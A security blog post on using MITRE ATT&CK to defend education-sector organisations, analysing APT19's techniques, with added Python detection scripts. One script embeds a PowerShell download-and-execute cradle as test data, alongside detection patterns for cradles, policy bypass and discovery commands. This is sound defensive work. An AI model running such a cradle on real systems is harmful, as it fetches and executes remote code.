How to use MITRE framework and APT19

A community superpower: MITRE ATT&CK and APT19


How you can leverage a community superpower, the MITRE framework, to combat cyber threats


Cybercrime is getting more serious by the month. Attackers are getting better at tricking people into clicking fraudulent links or opening malicious email attachments. Cyber attacks are increasingly organised crime: criminal groups join forces and share knowledge, tooling and practices. The recent ACSC threat report states that approximately one-quarter of reported cyber security incidents affected critical infrastructure organisations.

In this contest of good versus evil, we are lucky that the defenders have come together to identify the common techniques these attackers use. That information gives the cyber security team in any organisation the knowledge it needs to block cyber attacks, and to detect them if they break through.

In this blog post, I'll shed some light on how to use one of the free, globally accessible resources that offers comprehensive cyber security mitigation and detection guidance.

Cyber Security Superheroes

The group of good people is called MITRE, an American not-for-profit organisation supporting various U.S. government agencies in the defence, homeland security and cybersecurity fields, among others. MITRE's mission is to solve problems for a safer world. MITRE created MITRE ATT&CK®, a globally accessible knowledge base of adversary tactics and techniques based on real-world observations, which brings communities together to develop more effective cybersecurity.

The ATT&CK knowledge base is used as a foundation for developing specific threat models and methodologies in the private sector, in government, and in the cyber security product and service community. This knowledge is used to implement controls and provision monitoring functions that prevent and detect cyber attacks.

Below, I'll demonstrate how to use this information for one of Australia's most attacked industries, the education sector.

How to use the MITRE Superpower

ATT&CK stands for Adversarial Tactics, Techniques, and Common Knowledge. The framework is a matrix of cyber-attack techniques grouped by tactic, where a tactic is the adversary's goal at that stage of an intrusion. The Enterprise matrix defines the following tactics, in the order an intrusion typically progresses:

  1. Reconnaissance
  2. Resource Development
  3. Initial Access
  4. Execution
  5. Persistence
  6. Privilege Escalation
  7. Defence Evasion
  8. Credential Access
  9. Discovery
  10. Lateral Movement
  11. Collection
  12. Command and Control
  13. Exfiltration
  14. Impact

Each tactic has multiple techniques (many with sub-techniques) used by attackers. For each, MITRE provides mitigation and detection recommendations so organisations can defend against it.

Ideally, each organisation would go through all the tactics and associated techniques and implement every recommendation to ensure complete protection against all possible threats. However, this can be an overwhelming process that takes a long time to complete. Hence there is a need to prioritise implementation based on the common threats targeting the organisation's industry.

To address this, MITRE tracks Threat Groups. A Threat Group is a set of related intrusion activity, tracked under a common name in the security community, that may target a particular industry.

At the time of writing, six groups are identified for the education industry: APT19, DarkHydrus, HAFNIUM, SilverTerrier, Tonto Team and Turla. It's recommended that security teams in the education industry ensure they have coverage against all the techniques and tactics used by these groups.

To demonstrate this, I picked the APT19 group. APT19 is a China-based threat group that has targeted various industries, including education. I then navigated to the MITRE ATT&CK Navigator, a web-based tool for exploring ATT&CK matrices, to find the techniques and tactics attributed to the group.


In the following section, I analyse the techniques APT19 uses to carry out an attack and highlight some of the recommendations an education-sector security team should follow to counter each one. Readers should refer to the full material on the MITRE website for details; the sections below are for demonstration only.
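The Navigator's "techniques used by this group" view comes straight from the ATT&CK STIX data, and you can reproduce it offline. The script below is an added example (editor's code, not from the original post or from MITRE): it walks a STIX bundle shaped like MITRE's enterprise-attack bundle (github.com/mitre/cti), collects the techniques an intrusion set "uses", groups them by tactic, and writes a Navigator layer. The embedded bundle is a constructed, trimmed subset with shortened object ids; the external_id values (G0073 for APT19, T1189, T1059.001, T1140, T1082) are the real ATT&CK identifiers, while T0000 is a placeholder standing in for a revoked technique.

```python
"""Reproduce the Navigator's "techniques used by group" view from ATT&CK STIX data.

Added example, not part of the original post. The real data is the enterprise-attack
bundle published by MITRE (github.com/mitre/cti); the bundle below is a constructed,
trimmed subset that keeps only the fields this script reads. Object ids are shortened
stand-ins for the real STIX UUIDs; T0000 is a placeholder id for a revoked technique.
"""
import json
from collections import defaultdict


def _ref(external_id):
    return [{"source_name": "mitre-attack", "external_id": external_id}]


def _technique(obj_id, name, external_id, tactic, **extra):
    return {"type": "attack-pattern", "id": obj_id, "name": name,
            "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": tactic}],
            "external_references": _ref(external_id), **extra}


def _uses(n, source_ref, target_ref):
    return {"type": "relationship", "id": f"relationship--{n}", "relationship_type": "uses",
            "source_ref": source_ref, "target_ref": target_ref}


SAMPLE_BUNDLE = {"type": "bundle", "objects": [
    {"type": "intrusion-set", "id": "intrusion-set--apt19", "name": "APT19",
     "external_references": _ref("G0073")},
    {"type": "intrusion-set", "id": "intrusion-set--turla", "name": "Turla",
     "external_references": _ref("G0010")},
    _technique("attack-pattern--t1189", "Drive-by Compromise", "T1189", "initial-access"),
    _technique("attack-pattern--t1059.001", "PowerShell", "T1059.001", "execution"),
    _technique("attack-pattern--t1140", "Deobfuscate/Decode Files or Information", "T1140", "defense-evasion"),
    _technique("attack-pattern--t1082", "System Information Discovery", "T1082", "discovery"),
    # Real bundles keep revoked techniques, and relationships still point at them: skip those.
    _technique("attack-pattern--old", "Retired Technique", "T0000", "execution", revoked=True),
    _uses(1, "intrusion-set--apt19", "attack-pattern--t1189"),
    _uses(2, "intrusion-set--apt19", "attack-pattern--t1059.001"),
    _uses(3, "intrusion-set--apt19", "attack-pattern--t1140"),
    _uses(4, "intrusion-set--apt19", "attack-pattern--t1082"),
    _uses(5, "intrusion-set--apt19", "attack-pattern--old"),
    _uses(6, "intrusion-set--turla", "attack-pattern--t1082"),   # another group: must be filtered out
]}


def attack_id(obj):
    """Return the ATT&CK id (G0073, T1189, ...) carried in a STIX object's external references."""
    for ref in obj.get("external_references", []):
        if ref.get("source_name") == "mitre-attack":
            return ref.get("external_id")
    return None


def techniques_used_by(bundle, group_id):
    """Return {technique_id: (name, [tactics])} for every live technique the group 'uses'."""
    objs = {o["id"]: o for o in bundle["objects"]}
    group_ref = next((o["id"] for o in objs.values()
                      if o["type"] == "intrusion-set" and attack_id(o) == group_id), None)
    if group_ref is None:
        raise KeyError(f"group {group_id} not in bundle")
    used = {}
    for o in bundle["objects"]:
        if o["type"] != "relationship" or o["relationship_type"] != "uses" or o["source_ref"] != group_ref:
            continue
        tech = objs.get(o["target_ref"])
        if not tech or tech["type"] != "attack-pattern" or tech.get("revoked") or tech.get("x_mitre_deprecated"):
            continue
        tactics = [p["phase_name"] for p in tech.get("kill_chain_phases", [])
                   if p.get("kill_chain_name") == "mitre-attack"]
        used[attack_id(tech)] = (tech["name"], tactics)
    return used


def coverage_by_tactic(used):
    """Invert the mapping so a defender can read it column by column, as in the Navigator."""
    by_tactic = defaultdict(list)
    for tid, (_, tactics) in used.items():
        for tactic in tactics:
            by_tactic[tactic].append(tid)
    return {t: sorted(ids) for t, ids in by_tactic.items()}


def navigator_layer(group_id, used):
    """Build a layer JSON that the ATT&CK Navigator can open to highlight these techniques."""
    return {"name": f"{group_id} techniques", "domain": "enterprise-attack", "versions": {"layer": "4.4"},
            "techniques": [{"techniqueID": tid, "tactic": tactic, "score": 1, "color": "#ff6666"}
                           for tid, (_, tactics) in sorted(used.items()) for tactic in tactics]}


if __name__ == "__main__":
    apt19 = techniques_used_by(SAMPLE_BUNDLE, "G0073")
    print(json.dumps(coverage_by_tactic(apt19), indent=2))
    print(json.dumps(navigator_layer("G0073", apt19), indent=2))
```

Point the script at the full enterprise-attack.json to get the complete list for a group, and run it for each of the six education-sector groups to build the union of techniques your controls and detections need to cover.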

APT19 Attack Analysis using MITRE ATT&CK

APT19 Step 1 – Obtaining initial access to the user's system

The first step of the attack is to gain access to the environment. APT19 uses a technique called "Drive-by Compromise" to gain access to a user's system through its web browser.

As part of this technique, the group identifies a website that is frequently used by the education sector. Then they either compromise the website and inject malicious code into it, or place an ad carrying malicious code on the website through legitimate ad providers (malvertising).

The malicious code runs automatically when the page is visited, typically fingerprinting the browser and plugin versions to find a potentially vulnerable one.

When a vulnerable version is found, an exploit for that vulnerability is delivered to the browser, giving the adversary code execution on the user's system.

That's why you are continually asked to keep your browser and its plugins up to date, and why ad blockers are recommended. Organisations can also run analytics (for example machine learning jobs over proxy logs) that flag rare or unusual URLs, because a trusted site that suddenly pulls active content from a domain nobody in the organisation has visited before is a sign it may have been compromised.
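The rare-URL idea in the previous paragraph, as an added example (editor's code, not from the original post). It is a plain frequency baseline rather than a machine-learning job, but it makes the same point: the payload in a watering-hole or malvertising attack usually comes from a domain few users have ever touched. The proxy log format (timestamp, user, URL, response content type) and the log lines are constructed; the content-type list and the thresholds are assumptions to tune for your environment.

```python
"""Flag active content fetched from domains the organisation rarely visits.

Added example, not from the original post. A frequency baseline, not an ML job:
a domain is "rare" when fewer than MIN_USERS distinct users touched it during the
baseline window. Log format and lines are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit

# Constructed proxy log: timestamp user url response-content-type
PROXY_LOG = """\
2024-03-01T09:00:00 alice https://lms.example.edu/courses text/html
2024-03-01T09:00:01 alice https://static.example-cdn.com/app.js application/javascript
2024-03-02T09:05:00 bob https://lms.example.edu/courses text/html
2024-03-02T09:05:01 bob https://static.example-cdn.com/app.js application/javascript
2024-03-03T10:00:00 carol https://lms.example.edu/courses text/html
2024-03-03T10:00:01 carol https://static.example-cdn.com/app.js application/javascript
2024-03-04T11:00:00 dave https://lms.example.edu/courses text/html
2024-03-04T11:00:01 dave https://static.example-cdn.com/app.js application/javascript
2024-03-08T10:15:00 carol https://lms.example.edu/courses text/html
2024-03-08T10:15:01 carol https://static.example-cdn.com/app.js application/javascript
2024-03-08T10:15:02 carol https://cdn-stat.example-ads.net/p.js application/javascript
2024-03-08T10:15:03 carol https://update-flash.example.org/x.swf application/x-shockwave-flash
2024-03-08T10:20:00 dave https://news.example.net/story text/html
"""

# Content that executes in the browser or on the host; plain HTML from a new site is not interesting here.
ACTIVE_CONTENT = {"application/javascript", "text/javascript", "application/x-shockwave-flash",
                  "application/java-archive", "application/x-msdownload", "application/octet-stream"}
CUTOFF = datetime(2024, 3, 8)          # events before this build the baseline, events after are scored


def parse(log_text):
    events = []
    for line in log_text.splitlines():
        ts, user, url, ctype = line.split()
        events.append((datetime.fromisoformat(ts), user, urlsplit(url).hostname, ctype))
    return events


def rare_active_content(events, cutoff, baseline=timedelta(days=7), min_users=3):
    """Return active-content fetches after `cutoff` from hosts rarely seen in the baseline window."""
    seen_by = defaultdict(set)
    for ts, user, host, _ in events:
        if cutoff - baseline <= ts < cutoff:
            seen_by[host].add(user)
    hits = []
    for ts, user, host, ctype in sorted(events):
        if ts < cutoff or ctype not in ACTIVE_CONTENT:
            continue
        if len(seen_by[host]) < min_users:
            hits.append({"time": ts.isoformat(), "user": user, "host": host,
                         "content_type": ctype, "baseline_users": len(seen_by[host])})
    return hits


if __name__ == "__main__":
    for hit in rare_active_content(parse(PROXY_LOG), CUTOFF):
        print(hit)
```

In a real proxy log you would also key on the referrer: the flagged fetches above all follow a visit to the trusted learning-management site, which is exactly what points you at the compromised page rather than just the payload host.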

APT19 Step 2 – Executing code on the user’s system

The exploit delivered during initial access carries commands and scripts that execute arbitrary commands. These establish a connection to the adversary's command and control server, enabling remote execution of commands through command-line interfaces and scripting engines such as Unix shell, Windows Command Shell, PowerShell, Python, JavaScript and Visual Basic, among others.

The commands executed at this stage serve broader goals, such as exploring the network or stealing data. However, command-line and scripting activity can be captured through proper logging of process execution with command-line arguments, so the adversary has to worry about being detected.

That's why, on corporate laptops, scripting is restricted for standard users and users do not have admin privileges. It's also why network intrusion detection systems matter: they detect and block remote access and connections to known command and control (C2) servers.
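What "proper logging of process execution with command-line arguments" buys you, as an added example (editor's code, not from the original post). It assumes process-creation events that carry the full command line (Sysmon event ID 1, or Windows event 4688 with command-line auditing enabled) in a constructed host|user|parent image|command line format. It scores the switches attackers lean on, decodes an -EncodedCommand payload the way PowerShell does (base64 over UTF-16LE) and looks for download cradles inside it, and adds weight when an Office application is the parent. The sample events, weights and threshold are constructed.

```python
"""Triage process-creation events for hostile PowerShell invocations.

Added example, not from the original post. Assumes process-creation logging with
full command lines; event format and events are constructed. The encoded payload is
built here exactly the way PowerShell expects it so the decoder can be demonstrated.
"""
import base64
import binascii
import re

ENCODED_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a')".encode("utf-16-le")
).decode()

# Constructed events: host|user|parent image|command line
PROC_LOG = f"""\
host01|alice|winword.exe|powershell.exe -NoP -NonI -W Hidden -Exec Bypass -EncodedCommand {ENCODED_PAYLOAD}
host02|bob|explorer.exe|powershell.exe -ExecutionPolicy RemoteSigned -File C:\\Scripts\\backup.ps1
host03|svc_sql|services.exe|powershell.exe -NoProfile -Command "Get-Service MSSQLSERVER"
"""

# (regex, label, weight). powershell.exe accepts unambiguous prefixes of its switches, hence the alternations.
FLAG_RULES = [
    (r"-(?:w|win|windowstyle)\s+hidden\b", "hidden window", 1),
    (r"-(?:nop|noprofile)\b", "no profile", 1),
    (r"-(?:noni|noninteractive)\b", "non-interactive", 1),
    (r"-(?:ex|ep|exec|executionpolicy)\s+bypass\b", "execution policy bypass", 2),
]
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
CRADLE_RE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|IEX\b|Invoke-Expression"
                       r"|Net\.WebClient|FromBase64String", re.I)
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def analyse(cmdline):
    """Score one PowerShell command line; decode an encoded command and inspect it when present."""
    score, reasons, decoded = 0, [], None
    for pattern, label, weight in FLAG_RULES:
        if re.search(pattern, cmdline, re.I):
            score += weight
            reasons.append(label)
    m = ENCODED_RE.search(cmdline)
    if m:
        score += 3
        reasons.append("encoded command")
        try:
            decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
        except (binascii.Error, UnicodeDecodeError):
            reasons.append("undecodable payload")      # still worth a look: garbage here is rare in admin use
        else:
            hits = sorted({h.lower() for h in CRADLE_RE.findall(decoded)})
            if hits:
                score += 2 * len(hits)
                reasons.append("download cradle: " + ", ".join(hits))
    return {"score": score, "reasons": reasons, "decoded": decoded}


def triage(log_text, threshold=4):
    """Return (host, user, score, reasons) for events at or above the alert threshold."""
    alerts = []
    for line in log_text.splitlines():
        host, user, parent, cmdline = line.split("|", 3)
        result = analyse(cmdline)
        if parent.lower() in OFFICE_PARENTS:            # a document spawning a shell is a classic chain
            result["score"] += 2
            result["reasons"].append(f"spawned by {parent}")
        if result["score"] >= threshold:
            alerts.append((host, user, result["score"], result["reasons"]))
    return alerts


if __name__ == "__main__":
    for alert in triage(PROC_LOG):
        print(alert)
```

The encoded-command decode is the part worth keeping even if you throw the scoring away: a rule that only matches on -EncodedCommand fires on plenty of legitimate automation, whereas the decoded text shows what the script actually does.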

APT19 Step 3 – Avoid being detected

To stay hidden, the APT19 adversary uses defence evasion techniques, which include uninstalling or disabling security software and obfuscating or encrypting data and scripts, among others.

One such example is using certutil to decode a remote access tool's portable executable (PE) that has been hidden inside a certificate file. Another is using the Windows copy command with the /b (binary) option to reassemble binary fragments into a malicious payload.

The Windows registry, which holds configuration that Windows continually references during operation, is another place the adversary interacts with: to stash configuration information, and to remove entries as part of cleaning up.

Last but not least, the adversary may encrypt an executable or a file to make it difficult to discover.

Detecting such activity is not easy. That's why the behavioural analytics offered by Endpoint Detection and Response (EDR) software matter. Refer to my previous blog post to learn more about using EDR as a first line of defence against attacks.
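The certificate trick above is easy to hunt for once you know what certutil -decode actually does, which is nothing more than stripping the PEM armor and base64-decoding the body. The script below is an added example (editor's code, not from the original post): it performs that decode on a file and then checks whether the result has the DOS "MZ" magic and a "PE\0\0" signature at the offset stored in e_lfanew, which a real DER-encoded certificate (starting with the ASN.1 SEQUENCE byte 0x30) never does. The sample files are constructed, and the "PE" is only a header-shaped stub, not a real executable.

```python
"""Hunt for a PE hidden inside a certificate-looking file (the certutil -decode trick).

Added example, not from the original post. Reproduces the decode certutil performs
(strip PEM armor, base64-decode) and checks the result for Windows PE headers.
Sample files are constructed; the stub PE is a header only.
"""
import base64
import binascii
import re
import struct

PEM_RE = re.compile(rb"-----BEGIN CERTIFICATE-----(.*?)-----END CERTIFICATE-----", re.S)


def armor(raw):
    """Wrap bytes the way certutil -encode does: PEM header, 64-column base64 body, footer."""
    b64 = base64.b64encode(raw).decode()
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return ("-----BEGIN CERTIFICATE-----\n" + "\n".join(lines) + "\n-----END CERTIFICATE-----\n").encode()


def stub_pe():
    """Constructed buffer with a valid DOS header and PE signature (not runnable code)."""
    e_lfanew = 0x80
    header = bytearray(e_lfanew)
    header[:2] = b"MZ"
    struct.pack_into("<I", header, 0x3C, e_lfanew)          # e_lfanew: offset of the PE signature
    return bytes(header) + b"PE\x00\x00" + struct.pack("<H", 0x8664) + b"\x00" * 18


def looks_like_pe(data):
    """DOS 'MZ' magic plus a 'PE\\0\\0' signature at the offset stored in e_lfanew."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def decode_body(file_bytes):
    """What certutil -decode does: take the armored body (or the whole file) and base64-decode it."""
    m = PEM_RE.search(file_bytes)
    body = m.group(1) if m else file_bytes
    body = re.sub(rb"\s+", b"", body)
    try:
        return base64.b64decode(body, validate=True)
    except (binascii.Error, ValueError):
        return None


def classify(file_bytes):
    raw = decode_body(file_bytes)
    if raw is None:
        return "not base64"
    if looks_like_pe(raw):
        return "PE hidden in certificate armor"
    if raw[:1] == b"\x30":              # DER SEQUENCE: how a real X.509 certificate starts
        return "DER-encoded ASN.1 (plausibly a real certificate)"
    return "unknown payload"


if __name__ == "__main__":
    print(classify(armor(stub_pe())))
    print(classify(armor(b"\x30\x82\x01\x00" + b"\x00" * 20)))   # constructed DER-looking body
```

Run classify over files with certificate extensions written to user-writable paths (Downloads, %TEMP%, public folders), and pair it with a process-creation rule for certutil with -decode or -urlcache on the command line; the file check catches payloads that arrived by other means.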

APT19 Step 4 – Learn the environment

Once the APT19 adversary has hidden its traces, it is time to learn about the user's system and the internal network. This happens at three levels:

System Information Discovery: gathering detailed information about the operating system and hardware, including version, patches, hotfixes, service packs and architecture.

System Network Configuration Discovery: looking for details of the network configuration and settings, such as IP and MAC addresses, of the systems they access and of remote systems.

System Owner/User Discovery: identifying the primary user, the currently logged-in user, or the set of users that commonly use a system.

These activities cannot easily be mitigated with preventive controls, because they abuse legitimate system features. Hence it is important to monitor processes and command-line arguments for actions that gather information about the environment, and especially for several of them run in quick succession from one host, which is how an intruder behaves and an administrator usually does not.
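The three discovery levels above, turned into a detection, as an added example (editor's code, not from the original post). A single whoami or ipconfig is everyday admin activity, so the logic correlates: it classifies each command line into one of the three techniques (T1082, T1016, T1033) and alerts when one host runs two or more distinct techniques inside a short window. The event format (timestamp|host|user|command line), the events and the per-technique command lists are constructed; the lists are a starting point, not a complete inventory.

```python
"""Correlate discovery commands into a per-host burst alert.

Added example, not from the original post. Event format and events are constructed;
the command lists are a starting point, not a complete one.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

DISCOVERY = {
    "T1082 System Information Discovery": [
        r"^systeminfo\b", r"^hostname\b", r"^ver\b", r"^wmic\s+(?:os|cpu|computersystem)\b"],
    "T1016 System Network Configuration Discovery": [
        r"^ipconfig\b", r"^arp\s+-a\b", r"^route\s+print\b", r"^nbtstat\b", r"^getmac\b", r"^netsh\s+interface\b"],
    "T1033 System Owner/User Discovery": [
        r"^whoami\b", r"^quser\b", r"^qwinsta\b", r"^query\s+user\b", r"^net\s+user\b"],
}

# Constructed events: timestamp|host|user|command line
PROC_LOG = r"""2024-03-08T10:20:05|host01|carol|whoami
2024-03-08T10:20:09|host01|carol|cmd.exe /c systeminfo
2024-03-08T10:20:31|host01|carol|"C:\Windows\System32\ipconfig.exe" /all
2024-03-08T10:21:02|host01|carol|arp -a
2024-03-08T08:10:00|host02|dave|ipconfig /all
2024-03-08T11:45:00|host02|dave|whoami /groups
2024-03-08T09:30:00|host03|erin|ping 10.0.0.1
2024-03-08T09:30:10|host03|erin|nslookup lms.example.edu
"""

_IMAGE_PATH = re.compile(r'^"?(?:[a-z]:\\[^"\s]*\\)?([^"\s]+)"?')   # keep only the image basename
_CMD_WRAPPER = re.compile(r"^cmd(?:\.exe)?\s+/[ck]\s+")              # unwrap 'cmd /c <command>'


def normalise(cmdline):
    """Lower-case, drop the image directory and quotes, and unwrap a cmd /c wrapper."""
    cmd = _IMAGE_PATH.sub(r"\1", cmdline.strip().lower())
    cmd = _CMD_WRAPPER.sub("", cmd)
    return _IMAGE_PATH.sub(r"\1", cmd)


def classify(cmdline):
    """Return the discovery technique a command line belongs to, or None."""
    cmd = normalise(cmdline)
    for technique, patterns in DISCOVERY.items():
        if any(re.match(p, cmd) for p in patterns):
            return technique
    return None


def parse(log_text):
    events = []
    for line in log_text.splitlines():
        ts, host, user, cmdline = line.split("|", 3)
        events.append((datetime.fromisoformat(ts), host, user, cmdline))
    return events


def discovery_bursts(events, window=timedelta(minutes=5), min_techniques=2):
    """One alert per host: (host, window start, techniques) for the densest window found."""
    per_host = defaultdict(list)
    for ts, host, user, cmdline in events:
        technique = classify(cmdline)
        if technique:
            per_host[host].append((ts, user, technique, cmdline))
    alerts = []
    for host, hits in sorted(per_host.items()):
        hits.sort(key=lambda h: h[0])
        best, i = (set(), None), 0
        for j in range(len(hits)):                       # sliding window over time-ordered hits
            while hits[j][0] - hits[i][0] > window:
                i += 1
            techniques = {h[2] for h in hits[i:j + 1]}
            if len(techniques) > len(best[0]):
                best = (techniques, hits[i][0])
        if len(best[0]) >= min_techniques:
            alerts.append((host, best[1].isoformat(), sorted(best[0])))
    return alerts


if __name__ == "__main__":
    for alert in discovery_bursts(parse(PROC_LOG)):
        print(alert)
```

host02 runs the same commands as host01 but hours apart and never trips the rule, which is the behaviour you want: the signal is the burst, not any one command. Raise min_techniques to 3 on hosts where administrators work interactively all day.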

At this stage the adversary is ready to cause damage not only to the user's machine but also to the other systems on the same network and to the organisation. The adversary will be able to steal personal information and research data, and possibly send emails from legitimate accounts, among other activities.

What’s next?

The example above demonstrates an attack that may happen in the education sector and how a security team in the sector can leverage the rich information in MITRE ATT&CK to protect their organisation from cyberattacks.

Before it's too late, education-sector security teams should leverage the MITRE information, invest in studying the common threats and identify ways to protect against them. It's also crucial to implement a security monitoring capability that is on the lookout for malicious behaviour and can detect when a new technique has been used to bypass the security controls.


Author: Mouaz Alnouri